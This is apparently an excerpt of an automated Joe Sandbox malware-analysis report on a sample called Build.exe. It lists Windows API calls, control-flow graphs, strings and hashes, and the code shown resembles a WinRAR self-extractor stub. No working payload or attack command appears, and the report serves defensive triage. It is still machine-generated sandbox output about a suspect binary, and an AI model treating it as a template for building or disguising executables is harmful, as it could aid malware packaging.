                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 009404FD
                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00940514
                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00940565
                                                                                                    • Sleep.KERNEL32(?), ref: 00940593
                                                                                                    • DeleteObject.GDI32 ref: 009405CC
                                                                                                    • DeleteObject.GDI32(?), ref: 009405DC
                                                                                                    • CloseHandle.KERNEL32 ref: 0094061F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                    • API String ID: 3014515783-1210057712
                                                                                                    • Opcode ID: 0afc79d44b21e264dc7ee76163506f1badb05e12ef43b9af523f30dc998bd2ef
                                                                                                    • Instruction ID: 393919609470302c3806acde2dce6247fced190635a19f69ed24ea1becadef2d
                                                                                                    • Opcode Fuzzy Hash: 0afc79d44b21e264dc7ee76163506f1badb05e12ef43b9af523f30dc998bd2ef
                                                                                                    • Instruction Fuzzy Hash: 19711571518340ABD320AB72EC49F7B7BACEBC5745F008419FA85A32A1DF758944EF62

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 606 93c652-93c66f FindResourceW 607 93c675-93c686 SizeofResource 606->607 608 93c76b 606->608 607->608 609 93c68c-93c69b LoadResource 607->609 610 93c76d-93c771 608->610 609->608 611 93c6a1-93c6ac LockResource 609->611 611->608 612 93c6b2-93c6c7 GlobalAlloc 611->612 613 93c763-93c769 612->613 614 93c6cd-93c6d6 GlobalLock 612->614 613->610 615 93c75c-93c75d GlobalFree 614->615 616 93c6dc-93c6fa call 944250 614->616 615->613 620 93c755-93c756 GlobalUnlock 616->620 621 93c6fc-93c71e call 93c5b6 616->621 620->615 621->620 626 93c720-93c728 621->626 627 93c743-93c751 626->627 628 93c72a-93c73e GdipCreateHBITMAPFromBitmap 626->628 627->620 628->627 629 93c740 628->629 629->627
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0093DA3D,00000066), ref: 0093C665
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C67C
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C693
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C6A2
                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6BD
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6CE
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0093C756
                                                                                                      • Part of subcall function 0093C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0093C5BC
                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0093C737
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0093C75D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                    • String ID: PNG
                                                                                                    • API String ID: 541704414-364855578
                                                                                                    • Opcode ID: 005814d33ed62443dafe24c8a11a2d991e5447e961ab4e416f3655b6b200d243
                                                                                                    • Instruction ID: d9daeefcb2b183996b2d2a695880a6e8ca4abb88ff7b04ea68df70256cfc62c7
                                                                                                    • Opcode Fuzzy Hash: 005814d33ed62443dafe24c8a11a2d991e5447e961ab4e416f3655b6b200d243
                                                                                                    • Instruction Fuzzy Hash: 76314EB1618B02ABD7109F62ED88D2B7BACEF85752B050519F906E3261EB31D8149FA0
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,1C667296), ref: 0092F9CD
                                                                                                      • Part of subcall function 0092E208: _wcslen.LIBCMT ref: 0092E210
                                                                                                      • Part of subcall function 00932663: _wcslen.LIBCMT ref: 00932669
                                                                                                      • Part of subcall function 00933D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,1C667296,?,?,1C667296,00000001,0092DA04,00000000,1C667296,?,00010458,?,?), ref: 00933D2C
                                                                                                    • _wcslen.LIBCMT ref: 0092FD00
                                                                                                    • __fprintf_l.LIBCMT ref: 0092FE50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                                                                                    • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                    • API String ID: 2646189078-285229759
                                                                                                    • Opcode ID: 251f4cd8dafb26838d5d4fea2eaef7f8cb85d867ff9feb33b8f621a1052ec6ef
                                                                                                    • Instruction ID: 4bc4e58674e94c3e5965d8b38d34f30fae9e299e508b1406954f7d3fb3209a55
                                                                                                    • Opcode Fuzzy Hash: 251f4cd8dafb26838d5d4fea2eaef7f8cb85d867ff9feb33b8f621a1052ec6ef
                                                                                                    • Instruction Fuzzy Hash: 124206719002299BDF24EFA4E861BFE73B8FF58700F50053AEA05AB285E7719945CB54

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1055 92c4a8-92c4e3 call 941590 1058 92c4e5-92c4f0 FindFirstFileW 1055->1058 1059 92c548-92c551 FindNextFileW 1055->1059 1060 92c4f2-92c507 call 92da1e 1058->1060 1061 92c563-92c606 call 93268b call 92e27e call 933724 * 3 1058->1061 1059->1061 1062 92c553-92c561 GetLastError 1059->1062 1070 92c522-92c52b GetLastError 1060->1070 1071 92c509-92c520 FindFirstFileW 1060->1071 1068 92c60b-92c62c call 9410f9 1061->1068 1063 92c53d-92c543 1062->1063 1063->1068 1074 92c53b 1070->1074 1075 92c52d-92c530 1070->1075 1071->1061 1071->1070 1074->1063 1075->1074 1078 92c532-92c535 1075->1078 1078->1074 1080 92c537-92c539 1078->1080 1080->1063
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C4E6
                                                                                                      • Part of subcall function 0092DA1E: _wcslen.LIBCMT ref: 0092DA59
                                                                                                    • FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?), ref: 0092C516
                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A), ref: 0092C522
                                                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000), ref: 0092C549
                                                                                                    • GetLastError.KERNEL32(?,?,0092C39F,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C555
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 42610566-0
                                                                                                    • Opcode ID: 1077901b596fc6334b9ac7733b328da3b15f496f64b88585db74bb6c9b2dc675
                                                                                                    • Instruction ID: aea167857d3edea004f72e88cc1988fee88c7fdb702d8f12dbe5a5def37a69ad
                                                                                                    • Opcode Fuzzy Hash: 1077901b596fc6334b9ac7733b328da3b15f496f64b88585db74bb6c9b2dc675
                                                                                                    • Instruction Fuzzy Hash: 854180B150C751ABC324EF24D880AEEF7ECBB88350F400A1EF5AAD3240D734E9448BA1
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A661
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A668
                                                                                                    • ExitProcess.KERNEL32 ref: 0094A67A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: b2c282b217c08eb3b8c20a97990cbbf51df6dcb4b636a0e849ce02f4c249522a
                                                                                                    • Instruction ID: 806c5361d4b7d46bcb55aa2e8d05706919f945cbc836cc7fd0e1ecb55788a346
                                                                                                    • Opcode Fuzzy Hash: b2c282b217c08eb3b8c20a97990cbbf51df6dcb4b636a0e849ce02f4c249522a
                                                                                                    • Instruction Fuzzy Hash: 47E08C31094208AFCF116F62CD08E4C3B7AEF80752F454010F8088B132CB36EC42DB80
                                                                                                    APIs
                                                                                                      • Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                      • Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093DC06
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093DC24
                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0093DC37
                                                                                                    • TranslateMessage.USER32(?), ref: 0093DC45
                                                                                                    • DispatchMessageW.USER32(?), ref: 0093DC4F
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0093DC72
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0093DC95
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0093DCB8
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0093DCD3
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,009565F4), ref: 0093DCE6
                                                                                                      • Part of subcall function 0093F77B: _wcslen.LIBCMT ref: 0093F7A5
                                                                                                    • SetFocus.USER32(00000000), ref: 0093DCED
                                                                                                    • _swprintf.LIBCMT ref: 0093DD4C
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0093DDAF
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0093DDD7
                                                                                                    • GetTickCount.KERNEL32 ref: 0093DDF5
                                                                                                    • _swprintf.LIBCMT ref: 0093DE0D
                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0093DE3F
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0093DE92
                                                                                                    • _swprintf.LIBCMT ref: 0093DEC9
                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00973482,00000200), ref: 0093DF1D
                                                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,00973482,00000200), ref: 0093DF33
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00973482,00000400,00000001,00000001,?,?,?,?,00973482,00000200), ref: 0093DF8A
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0093DFB2
                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,00973482,00000200), ref: 0093DFFA
                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00973482,00000400,?,?,?,?,00973482,00000200), ref: 0093E023
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00973482,00000200), ref: 0093E02C
                                                                                                    • _swprintf.LIBCMT ref: 0093E05F
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E0BE
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,009565F4), ref: 0093E0D5
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0093E0DE
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0093E0ED
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0093E0FC
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E1A9
                                                                                                    • _wcslen.LIBCMT ref: 0093E1FF
                                                                                                    • _swprintf.LIBCMT ref: 0093E229
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,0004045F), ref: 0093E273
                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0093E28D
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0093E296
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0093E2AC
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0093E2C6
                                                                                                    • SetWindowTextW.USER32(00000000,0097589A), ref: 0093E2E8
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0093E348
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E35B
                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0093E3FE
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0093E4CC
                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0093E50E
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0093E532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                    • API String ID: 3247240745-454947156
                                                                                                    • Opcode ID: fd114fb797008008059b842be9cc199e3515a5c9623948a6b81276c0f542e120
                                                                                                    • Instruction ID: 262e69ee942a6c3ac152dedf6d5c4cbe621b4589cf324d2f362b2e76bd6f216f
                                                                                                    • Opcode Fuzzy Hash: fd114fb797008008059b842be9cc199e3515a5c9623948a6b81276c0f542e120
                                                                                                    • Instruction Fuzzy Hash: A242F8B1958344BAEB21AFB0EC4AFFE7BACAB41B04F104015F945B61E1CBB44A44DF61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 273 93290a-932941 call 941590 GetModuleHandleW 276 932943-932953 GetProcAddress 273->276 277 932999-932bfa 273->277 278 932955-93296b 276->278 279 93296d-93297d GetProcAddress 276->279 280 932c00-932c0d call 949e7e 277->280 281 932cda 277->281 278->279 279->277 282 93297f-932994 279->282 283 932cdc-932d08 GetModuleFileNameW call 92e208 call 93268b 280->283 290 932c13-932c41 GetModuleFileNameW CreateFileW 280->290 281->283 282->277 297 932d0a-932d16 call 92d076 283->297 292 932c47-932c53 SetFilePointer 290->292 293 932ccc-932cd8 CloseHandle 290->293 292->293 294 932c55-932c71 ReadFile 292->294 293->283 294->293 298 932c73-932c7f 294->298 305 932d45-932d6c call 92e27e GetFileAttributesW 297->305 306 932d18-932d23 call 9328ab 297->306 300 932c85-932ca4 298->300 301 932ede-932ee3 call 9413f9 298->301 303 932cc1-932cca call 9323d6 300->303 303->293 313 932ca6-932cc0 call 9328ab 303->313 317 932d76 305->317 318 932d6e-932d72 305->318 306->305 316 932d25-932d35 306->316 313->303 324 932d40-932d43 316->324 321 932d78-932d7d 317->321 318->297 320 932d74 318->320 320->321 322 932db4-932db6 321->322 323 932d7f 321->323 326 932ec3-932edb call 9410f9 322->326 327 932dbc-932dd3 call 92e252 call 92d076 322->327 325 932d81-932da8 call 92e27e GetFileAttributesW 323->325 324->305 324->318 334 932db2 325->334 335 932daa-932dae 325->335 339 932dd5-932e36 call 9328ab * 2 call 930597 call 924c00 call 930597 call 93c774 327->339 340 932e3b-932e6e call 924c00 AllocConsole 327->340 334->322 335->325 337 932db0 335->337 337->322 347 932ebb-932ebd ExitProcess 339->347 346 932e70-932eb5 GetCurrentProcessId AttachConsole call 946433 GetStdHandle WriteConsoleW Sleep FreeConsole 340->346 340->347 346->347
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32 ref: 00932937
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00932949
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00932973
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00932C1D
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00932C37
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00932C4B
                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00956F24,00000000), ref: 00932C69
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00932CCD
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00932CE6
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,00956F70,?,DXGIDebug.dll,?,00956F24,?,00000000,?,00000800), ref: 00932D3A
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00956F24,00000800,?,00000000,?,00000800), ref: 00932D64
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00932DA0
                                                                                                      • Part of subcall function 009328AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009328D4
                                                                                                      • Part of subcall function 009328AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00931309,Crypt32.dll,00000000,00931383,00000200,?,00931366,00000000,00000000,?), ref: 009328F4
                                                                                                    • _swprintf.LIBCMT ref: 00932E12
                                                                                                    • _swprintf.LIBCMT ref: 00932E5E
                                                                                                    • AllocConsole.KERNEL32 ref: 00932E66
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00932E70
                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00932E77
                                                                                                    • _wcslen.LIBCMT ref: 00932E8C
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00932E9D
                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00932EA4
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00932EAF
                                                                                                    • FreeConsole.KERNEL32 ref: 00932EB5
                                                                                                    • ExitProcess.KERNEL32 ref: 00932EBD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                                                                                    • String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                    • API String ID: 270162209-1156125387
                                                                                                    • Opcode ID: 697b4a64c9f31c71d113b7eec4fd46e4c75774eae8f19506c021303afaef50d3
                                                                                                    • Instruction ID: 6fcdb663bc953f7cc14ae458b4a6d6728ebc3d086cf8a33b611b46726191c555
                                                                                                    • Opcode Fuzzy Hash: 697b4a64c9f31c71d113b7eec4fd46e4c75774eae8f19506c021303afaef50d3
                                                                                                    • Instruction Fuzzy Hash: 7DD143B100C3849BD730DFA2E849B9FBBECAB85706F50091DF99997190D7B0864C8F62

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0093D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0093D875
                                                                                                      • Part of subcall function 0093D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D886
                                                                                                      • Part of subcall function 0093D864: IsDialogMessageW.USER32(00010458,?), ref: 0093D89A
                                                                                                      • Part of subcall function 0093D864: TranslateMessage.USER32(?), ref: 0093D8A8
                                                                                                      • Part of subcall function 0093D864: DispatchMessageW.USER32(?), ref: 0093D8B2
                                                                                                    • GetDlgItem.USER32(00000068,00983CF0), ref: 0093F81F
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,0093D099,00000001,?,?,0093DAB9,009582F0,00983CF0,00983CF0,00001000,009650C4,00000000,?), ref: 0093F844
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0093F853
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,009565F4), ref: 0093F861
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0093F87B
                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0093F895
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0093F8D9
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0093F8E4
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0093F8F7
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0093F91E
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,0095769C), ref: 0093F92D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
